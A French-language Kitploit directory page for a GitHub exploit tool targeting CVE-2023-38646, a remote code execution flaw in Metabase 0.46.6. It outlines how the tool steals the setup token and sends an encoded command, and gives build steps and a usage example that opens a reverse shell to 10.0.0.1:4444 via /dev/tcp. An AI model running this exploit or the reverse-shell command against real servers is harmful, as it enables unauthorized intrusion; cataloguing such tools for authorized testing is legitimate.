Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-38646 — Exploit pour CVE-2023-38646 dans Metabase 0.46.6, permettant l'exécution de code à distance via des requêtes conçues et la récupération du jeton de configuration. | Kitploit
Outils/GitHubGitHub/danithehack3r/cve-2023-38646
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCheval de Troie d'Accès à Distance
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

Exploit pour CVE-2023-38646 dans Metabase 0.46.6, permettant l'exécution de code à distance via des requêtes conçues et la récupération du jeton de configuration.

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-38646

Exploit CVE-2023-38646 Metabase 0.46.6

Cet outil exploite une vulnérabilité (CVE-2023-38646) dans une plateforme logicielle. L'exploit permet l'exécution de code à distance via une requête spécialement conçue, en tirant parti d'une chaîne de connexion à la base de données mal gérée.

Aperçu

L'outil :

  • Récupère le jeton d'initialisation (setup token) depuis l'URL cible.
  • Encode en Base64 la commande fournie.
  • Construit la charge utile (payload) avec la commande encodée.
  • Envoie la charge utile pour exploiter la vulnérabilité.

Installation

Clonez le dépôt :

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

Utilisation

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL : L'URL de la plateforme à analyser et à exploiter. COMMAND : La commande à exécuter sur la cible. PROXY_URL (Optionnel) : L'URL du serveur proxy (par exemple, http://127.0.0.1:8080). Si non fournie, aucun proxy ne sera utilisé.

Exemple avec un reverse shell sh

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de recherche. Assurez-vous toujours d'avoir l'autorisation appropriée avant d'analyser ou d'exploiter une cible. Toute utilisation abusive de cet outil va strictement à l'encontre de l'intention du développeur et pourrait être illégale.

Retours & Contributions

N'hésitez pas à ouvrir des issues pour tout retour, bug ou demande de fonctionnalité. Les pull requests sont toujours les bienvenues !

Télécharger l’outil